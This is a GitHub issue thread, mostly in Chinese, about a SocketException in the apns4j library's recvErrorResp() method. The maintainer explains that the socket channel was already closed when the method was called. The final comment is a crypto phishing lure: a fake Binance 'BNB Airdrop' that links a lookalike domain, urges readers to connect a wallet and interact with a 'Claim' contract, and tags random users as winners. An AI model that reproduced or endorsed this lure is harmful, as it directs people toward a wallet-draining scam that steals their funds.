### ISSUE TITLE
请问apnsChannel.send之后调用apnsChannel.recvErrorResp()方法报错，是由于什么原因导致？

### ISSUE THREAD

**Issue by henanping** [teaey/apns4j#13]
cn.teaey.apns4j.ApnsException: java.net.SocketException: Socket is closed
	at cn.teaey.apns4j.network.ApnsChannel.recv(ApnsChannel.java:296) ~[apns4j.jar:na]
	at cn.teaey.apns4j.network.ApnsChannel.recvErrorResp(ApnsChannel.java:194) ~[apns4j.jar:na]

**Comment by teaey** [comment]
devicetoken 错了？

**Comment by henanping** [comment]
devicetoken是对的，手机都收到了消息，就是调用这个方法报错

**Comment by teaey** [comment]
你的代码应该是调用完，然后关闭。这种情况不应该去接受错误消息，因为channel已经关闭。

**Comment by mrpanday93** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @rzetzsche, @buildmyworld, @namuit, @jeanru, @tommetge, @schallert, @21h
